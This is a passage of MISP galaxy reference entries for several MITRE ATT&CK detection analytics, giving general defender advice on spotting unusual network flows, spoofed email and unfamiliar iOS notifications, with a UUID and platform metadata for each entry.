Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Internal MISP references

UUID 705ecef8-b41e-4b1f-bd7c-f3b2ff930c11 which can be used as unique global reference for Analytic 1997 - AN1997 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1997
mitre_platforms ['PRE']

Analytic 1799 - AN1799

If the user sees a notification with text they do not recognize, they should review their list of installed applications.

Internal MISP references

UUID 3d12c26c-740d-4393-9659-52a424586b20 which can be used as unique global reference for Analytic 1799 - AN1799 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1799
mitre_platforms ['iOS']

Analytic 1988 - AN1988

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID c752faa1-9cc2-421a-b646-0efe4da990c9 which can be used as unique global reference for Analytic 1988 - AN1988 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1988
mitre_platforms ['PRE']

Analytic 1989 - AN1989

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 8a75f571-49f8-4df8-b02c-fad2189273ee which can be used as unique global reference for Analytic 1989 - AN1989 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1989
mitre_platforms ['PRE']

Analytic 1998 - AN1998

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Internal MISP references

UUID ac4bf64e-da14-4416-8961-f0736eb4d9be which can be used as unique global reference for Analytic 1998 - AN1998 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1998
mitre_platforms ['PRE']

Analytic 1999 - AN1999

Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

Internal MISP references

UUID f2f01ea3-a59c-42b1-b934-83065ae1f785 which can be used as unique global reference for Analytic 1999 - AN1999 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1999
mitre_platforms ['PRE']